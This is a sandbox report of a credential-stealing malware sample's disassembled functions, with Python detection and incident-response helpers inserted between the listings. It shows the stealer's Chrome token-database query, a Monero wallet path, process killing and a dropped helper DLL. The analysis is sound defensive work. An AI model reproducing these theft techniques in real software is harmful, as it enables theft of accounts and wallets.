                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ACBC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBD75
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: bf2447e58fa57532e7c71acb2409a5ccc90cf9f3c9b59a430639ab51a81510bf
                                      • Instruction ID: 115b3c4a981cc4d5bdce20363aaa878c8ae2881732df0189caee9a99b38469c4
                                      • Opcode Fuzzy Hash: bf2447e58fa57532e7c71acb2409a5ccc90cf9f3c9b59a430639ab51a81510bf
                                      • Instruction Fuzzy Hash: 19B10572920118ABCF14FBA0DE66EEE7339AF64300F40455AF54766291EF346E49CB72
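The string list of the entry above carries the exact query this function runs against the Chrome profile's "Web Data" SQLite database, `SELECT service, encrypted_token FROM token_service`, together with the `AccountId` marker it looks for with StrStrA. The Python below is an added incident-response helper, not code from the Joe Sandbox report or from the sample: it runs that same query against a constructed stand-in database to list which accounts' OAuth refresh tokens a Stealc infection would have carried off (so they can be revoked) and classifies each blob's protection from its prefix without decrypting anything. The in-memory table, its rows and the account IDs are constructed for the example; the `AccountId-` service-name prefix is Chromium's convention, which the report's string list also shows.

```python
"""IR helper for the query this function runs against Chrome's "Web Data"
SQLite database: SELECT service, encrypted_token FROM token_service.
Added example for this page, not Stealc or Joe Sandbox code. It lists which
accounts had OAuth refresh tokens stored in a profile so they can be revoked,
and classifies how each blob is protected, without decrypting anything.
The rows below are constructed; real blobs are opaque ciphertext."""
import sqlite3

QUERY = "SELECT service, encrypted_token FROM token_service"  # as seen in the sample

# Known blob layouts written by Chromium's os_crypt on Windows:
#   "v10" prefix -> AES-256-GCM, key kept DPAPI-wrapped in the profile's Local State
#   "v20" prefix -> app-bound encryption (Chrome 127+), key released to Chrome by an elevated service
#   DPAPI header -> legacy CryptProtectData blob, decryptable by any process of the same user
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def build_sample_web_data() -> sqlite3.Connection:
    """Construct an in-memory stand-in for Web Data with Chrome's token_service schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE token_service (service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)")
    rows = [  # constructed account IDs and constructed ciphertext, only the prefixes matter
        ("AccountId-110000000000000000001", b"v10" + b"\x11" * 12 + b"\x22" * 40),
        ("AccountId-110000000000000000002", DPAPI_HEADER + b"\x33" * 60),
        ("AccountId-110000000000000000003", b"v20" + b"\x44" * 48),
    ]
    conn.executemany("INSERT INTO token_service VALUES (?, ?)", rows)
    return conn


def classify_blob(blob: bytes) -> str:
    """Name the protection scheme from the blob prefix; never attempts decryption."""
    if blob.startswith(b"v20"):
        return "app-bound (v20)"
    if blob.startswith(b"v10"):
        return "os_crypt AES-GCM (v10)"
    if blob.startswith(DPAPI_HEADER):
        return "legacy DPAPI"
    return "unknown"


def exposed_accounts(conn: sqlite3.Connection) -> list:
    """Run the same query the stealer runs and report what it would have obtained."""
    out = []
    for service, blob in conn.execute(QUERY):
        # Chromium stores refresh tokens under "AccountId-<gaia id>"
        account = service.split("-", 1)[1] if service.startswith("AccountId-") else service
        out.append({"account": account, "protection": classify_blob(bytes(blob)), "bytes": len(blob)})
    return out


if __name__ == "__main__":
    for row in exposed_accounts(build_sample_web_data()):
        print(row)
```

Point `sqlite3.connect` at a copy of a real `Web Data` file (never the live one, Chrome holds a lock) to get the revocation list for an affected host; the protection column tells you whether the attacker also needed the profile's Local State key or an app-bound bypass to use what it copied.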
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: ec4f7e6aa01c9627c98919c7db88bbc6a476d5c7c1b76771691759f0bc1782d2
                                      • Instruction ID: 84ed8213786bd071399c7dc078fce3f8fd09e087b3cebc39827c21fcbc22ae5e
                                      • Opcode Fuzzy Hash: ec4f7e6aa01c9627c98919c7db88bbc6a476d5c7c1b76771691759f0bc1782d2
                                      • Instruction Fuzzy Hash: EDF05E30A1C309EFD3449FE0EA0979CBB30EB04747F114197F64AE62A0C6704A409B65
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00AD08DC,C:\ProgramData\chrome.dll), ref: 00AD9871
                                        • Part of subcall function 00ACA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
                                      • StrCmpCA.SHLWAPI(00000000,01548BD8), ref: 00AD0922
                                      • StrCmpCA.SHLWAPI(00000000,01548B38), ref: 00AD0B79
                                      • StrCmpCA.SHLWAPI(00000000,01548C48), ref: 00AD0A0C
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00AD0C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00AD0C30
                                      • C:\ProgramData\chrome.dll, xrefs: 00AD08CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: 258b67d18b59e90968323e874963e134156c51a5ba89a008cdbb4428107367f5
                                      • Instruction ID: 9d4e488072e18a33f07e786303b09af85b7e0499f78f99c0745f3387ddb1280d
                                      • Opcode Fuzzy Hash: 258b67d18b59e90968323e874963e134156c51a5ba89a008cdbb4428107367f5
                                      • Instruction Fuzzy Hash: 4CA135717002489FCB18EF64DA96FAD7776AF95300F50856EE40B9F351DA30DA05CB92
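Three of the function entries above are raw Win32 call sequences worth recognising mechanically: the 00AD99A0 subcall walks the process list with CreateToolhelp32Snapshot/Process32Next and opens each target with OpenProcess(00000001, i.e. PROCESS_TERMINATE) before TerminateProcess; the routine at 00AC615F streams a URL through InternetReadFile into a file it created with CreateFileA; and the entry directly above writes C:\ProgramData\chrome.dll, loads it with LoadLibraryA and removes it with DeleteFileA. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses "APIs" lines in the report's own format and flags those three chains. The excerpts it runs on are copied from the entries above; the rule set, its thresholds and the finding strings are the example's own.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.
Added example for this page, not Joe Sandbox code. It parses lines of the form
  • Name.MODULE(arg,...), ref: ADDR
  • Part of subcall function ADDR: Name.MODULE(arg,...), ref: ADDR
and flags the call chains behind the report's signatures."""
import re
from dataclasses import dataclass
from typing import Optional

LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
PROCESS_TERMINATE = 0x0001  # OpenProcess desired-access bit (winnt.h)


@dataclass
class Call:
    name: str               # API name with the A/W encoding suffix removed
    module: str
    args: list              # arguments as printed: hex literals, '?', strings, paths
    ref: int                # address of the call site
    subcall: Optional[int]  # callee address when the report marks it as a subcall


def as_int(arg: str) -> Optional[int]:
    """Hex literal as printed by the report, or None for '?', strings and paths."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def parse_api_lines(text: str) -> list:
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip().lstrip("•").strip())
        if not m:
            continue  # headings such as "APIs" or "Strings", blank lines
        name = m.group("name")
        if name[-1] in "AW" and len(name) > 3:
            name = name[:-1]  # CreateFileA / lstrcpyW -> CreateFile / lstrcpy
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(Call(name, m.group("module"), args, int(m.group("ref"), 16),
                          int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def detect(calls: list) -> list:
    names = {c.name for c in calls}
    findings = []
    # Enumerate every process and kill selected ones (the 00AD99A0 subcall).
    if {"CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"} <= names:
        masks = [as_int(c.args[0]) for c in calls if c.name == "OpenProcess" and c.args]
        if any(m is not None and m & PROCESS_TERMINATE for m in masks):
            findings.append("process-kill: Toolhelp32 walk + OpenProcess(PROCESS_TERMINATE) + TerminateProcess")
    # Fetch a URL and stream it into a freshly created file.
    if {"InternetOpenUrl", "InternetReadFile", "CreateFile", "WriteFile"} <= names:
        findings.append("download-to-disk: InternetOpenUrl -> InternetReadFile -> WriteFile")

    # Same path handed to LoadLibrary and DeleteFile: a dropped helper DLL
    # that is loaded and then removed from disk.
    def paths(api):
        return {a for c in calls if c.name == api for a in c.args if "\\" in a}
    for p in sorted(paths("LoadLibrary") & paths("DeleteFile")):
        how = "created, loaded and deleted" if p in paths("CreateFile") else "loaded and deleted"
        findings.append(f"drop-load-delete: {p} is {how} by the same function")
    return findings


# Excerpts copied from this report's function entries.
KILL_FN = r"""
• Sleep.KERNEL32(00001388), ref: 00ACA013
  • Part of subcall function 00AD99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD99C5
  • Part of subcall function 00AD99A0: Process32First.KERNEL32(00ACA056,00000128), ref: 00AD99D9
  • Part of subcall function 00AD99A0: Process32Next.KERNEL32(00ACA056,00000128), ref: 00AD99F2
  • Part of subcall function 00AD99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD9A4E
  • Part of subcall function 00AD99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9A6C
  • Part of subcall function 00AD99A0: CloseHandle.KERNEL32(00000000), ref: 00AD9A79
"""
DOWNLOAD_FN = r"""
• InternetOpenA.WININET(00AE0DFB,00000001,00000000,00000000,00000000), ref: 00AC615F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AC61DF
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AC6203
• InternetReadFile.WININET(?,?,00000400,?), ref: 00AC622C
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AC625A
"""
DROP_FN = r"""
  • Part of subcall function 00AD9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00AD08DC,C:\ProgramData\chrome.dll), ref: 00AD9871
  • Part of subcall function 00ACA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00AD0C35
"""
MEMINFO_FN = r"""
• GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AD82E8
• wsprintfA.USER32 ref: 00AD833C
"""

if __name__ == "__main__":
    for label, text in [("kill", KILL_FN), ("download", DOWNLOAD_FN),
                        ("drop", DROP_FN), ("meminfo", MEMINFO_FN)]:
        print(label, detect(parse_api_lines(text)) or ["no chain matched"])
```

The MEMINFO_FN excerpt (the "%d MB" function) is included to show a negative: GlobalMemoryStatusEx followed by wsprintfA is host fingerprinting, which none of these three rules claim. The rules check the argument values the report prints, not only API names, so an OpenProcess with PROCESS_QUERY_INFORMATION only would not be reported as a process killer.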
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00B3FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00B3FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c7901d318d7082d3d82a194e138882a6116e74b161cfa8838e1058df0796cc5d
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 7C418474D0011AEBCF10EF68C884AAEBBF5FF49314F2481E5E918AB351D7319A15CB91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AC501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC5021
                                      • InternetOpenA.WININET(00AE0DE3,00000000,00000000,00000000,00000000), ref: 00AC503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AC5061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AC5091
                                      • InternetCloseHandle.WININET(?), ref: 00AC5109
                                      • InternetCloseHandle.WININET(?), ref: 00AC5116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: bdc29eca70a7e393c25e6a3072ebaa6247d37748c81e52e385b606623c677744
                                      • Instruction ID: 9e12ec6da16707a62e85356698c345d73f7ba10edb4e837d205ad0b3a4e0e2c7
                                      • Opcode Fuzzy Hash: bdc29eca70a7e393c25e6a3072ebaa6247d37748c81e52e385b606623c677744
                                      • Instruction Fuzzy Hash: 7831F5B4E44218ABDB20DF54DD85BDDB7B4AB48304F1081D9FA09A7381D7706AC58FA8
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AD85B6
                                      • wsprintfA.USER32 ref: 00AD85E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AD860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8629
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F200,00000000,000F003F,?,00000400), ref: 00AD867C
                                      • lstrlen.KERNEL32(?), ref: 00AD8691
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F188,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00AE0B3C), ref: 00AD8729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD87AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 22c22fc6265e97dfb619d5ae324ee79491092535439c9a95a94cb198c48cbfbd
                                      • Instruction ID: 7da022d7cff501ac91f7b2a0bb101e60869a9f58d900694f5290d072eadec8cd
                                      • Opcode Fuzzy Hash: 22c22fc6265e97dfb619d5ae324ee79491092535439c9a95a94cb198c48cbfbd
                                      • Instruction Fuzzy Hash: 9A21FF7191021C9BDB24DB54DC85FD973B8FB48700F1085D9E609A6240DF756A85CFE4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD99C5
                                      • Process32First.KERNEL32(00ACA056,00000128), ref: 00AD99D9
                                      • Process32Next.KERNEL32(00ACA056,00000128), ref: 00AD99F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD9A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9A79
                                      • CloseHandle.KERNEL32(00ACA056), ref: 00AD9A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: e381fcdb912259f688301feb526644f4283f0c778a96e9c6112e1bf0ef2cf29c
                                      • Instruction ID: 6d705d7dcdb625b1b92cb3fefee9752b8fced3f24e3a0dbeed41dbc9212501e0
                                      • Opcode Fuzzy Hash: e381fcdb912259f688301feb526644f4283f0c778a96e9c6112e1bf0ef2cf29c
                                      • Instruction Fuzzy Hash: 2C21EA75914318ABDB21DFA1DC88BDEB7B9BB48340F1041C9E50AA73A0D7749E85CFA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B728,00000000,00020119,00000000), ref: 00AD786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F1A0,00000000,00000000,?,000000FF), ref: 00AD788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD7898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 4f23b4de56536f5d42941b2a302e346f3e4bfc4c0bbba76ab82b0825ca836761
                                      • Instruction ID: ed40cda78fdf6ca9881dbbfb717aee9d0da93552cb5df00cdf1cde465d0cf022
                                      • Opcode Fuzzy Hash: 4f23b4de56536f5d42941b2a302e346f3e4bfc4c0bbba76ab82b0825ca836761
                                      • Instruction Fuzzy Hash: C3016275A18304BBEB04DBE4DD49F6E7778EB48B00F004096FA05E7390E7709A40DB64
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD78C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD78CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B728,00000000,00020119,00AD7849), ref: 00AD78EB
                                      • RegQueryValueExA.ADVAPI32(00AD7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00AD790A
                                      • RegCloseKey.ADVAPI32(00AD7849), ref: 00AD7914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: a33229f16418550eede972f28b9fb72e8f898164cf410386a539cade75553268
                                      • Instruction ID: c08d6410991ea2e5d281c98cc522258bcbb4f112e77f16cfac2a9a963fd15e1c
                                      • Opcode Fuzzy Hash: a33229f16418550eede972f28b9fb72e8f898164cf410386a539cade75553268
                                      • Instruction Fuzzy Hash: 6801F4B5A54309BBDB00DBE4DC49FAE7778EB44700F104596F605E7395E7705A408BA0
                                      APIs
                                      • memset.MSVCRT ref: 00AD4325
                                      • RegOpenKeyExA.ADVAPI32(80000001,0154E268,00000000,00020119,?), ref: 00AD4344
                                      • RegQueryValueExA.ADVAPI32(?,0154F548,00000000,00000000,00000000,000000FF), ref: 00AD4368
                                      • RegCloseKey.ADVAPI32(?), ref: 00AD4372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD4397
                                      • lstrcat.KERNEL32(?,0154F308), ref: 00AD43AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: b7c5fbfcb9a3966a1eef9cdda617fa970fc16bcb0ce416a9e07f404b0e229933
                                      • Instruction ID: d5da25d4e893aeb4f1e02e8c92b7ff002b266a277460924cc64d6c410d1efc54
                                      • Opcode Fuzzy Hash: b7c5fbfcb9a3966a1eef9cdda617fa970fc16bcb0ce416a9e07f404b0e229933
                                      • Instruction Fuzzy Hash: 41417EB69102086BDF14EBA0ED56FEE733DAB4C700F00855DB71697281FA7597888BE1
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                      • LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 2a2374d24557d71e7d995ff4be3e9c84c5fecfc2a7f4197291c86a4a64d5d63a
                                      • Instruction ID: e25e38204c2165ce616ddec7e04d2c19972bccef49c63367ccae356e3aec5df6
                                      • Opcode Fuzzy Hash: 2a2374d24557d71e7d995ff4be3e9c84c5fecfc2a7f4197291c86a4a64d5d63a
                                      • Instruction Fuzzy Hash: EF31EA74A10209EFDB14CFA4D889FEE7BB5BF58704F108259E911A7390D774AA81CFA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Typememset
                                      • String ID:
                                      • API String ID: 3530896902-3916222277
                                      • Opcode ID: 09055c1f6afc0a5a947a4ae703cbeed7e19c236372938f88b6cdb07f1bfedfe4
                                      • Instruction ID: c780e35feb4deebc8c4a367ce11848531aeb0eef1f5d580db4954b388e6d449e
                                      • Opcode Fuzzy Hash: 09055c1f6afc0a5a947a4ae703cbeed7e19c236372938f88b6cdb07f1bfedfe4
                                      • Instruction Fuzzy Hash: 6F4128B011078C5EDB318B248D84FFB7BF8AB45714F5444EAEA8B97282E2719B44DF20
                                      APIs
                                      • lstrcat.KERNEL32(?,0154F380), ref: 00AD4A2B
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD4A51
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4A70
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4A84
                                      • lstrcat.KERNEL32(?,0153A8D8), ref: 00AD4A97
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4AAB
                                      • lstrcat.KERNEL32(?,0154E1E8), ref: 00AD4ABF
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD8F20: GetFileAttributesA.KERNEL32(00000000,?,00AC1B94,?,?,00AE577C,?,?,00AE0E22), ref: 00AD8F2F
                                        • Part of subcall function 00AD47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AD47D0
                                        • Part of subcall function 00AD47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD47D7
                                        • Part of subcall function 00AD47C0: wsprintfA.USER32 ref: 00AD47F6
                                        • Part of subcall function 00AD47C0: FindFirstFileA.KERNEL32(?,?), ref: 00AD480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 5e5ae638f181e607dc438ad257e9be690fcb3bf15e7907a6df4587a49b336a2d
                                      • Instruction ID: c7d60296d842f45d0947a310d392662c4e52aa0448c01f9488ddc2f7a8197a45
                                      • Opcode Fuzzy Hash: 5e5ae638f181e607dc438ad257e9be690fcb3bf15e7907a6df4587a49b336a2d
                                      • Instruction Fuzzy Hash: 303160B291021867CB14FBB0DD85FDD733CAB58700F40458BB24696251EE74E7C8CBA8
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD2FD5
                                      Strings
                                      • ')", xrefs: 00AD2F03
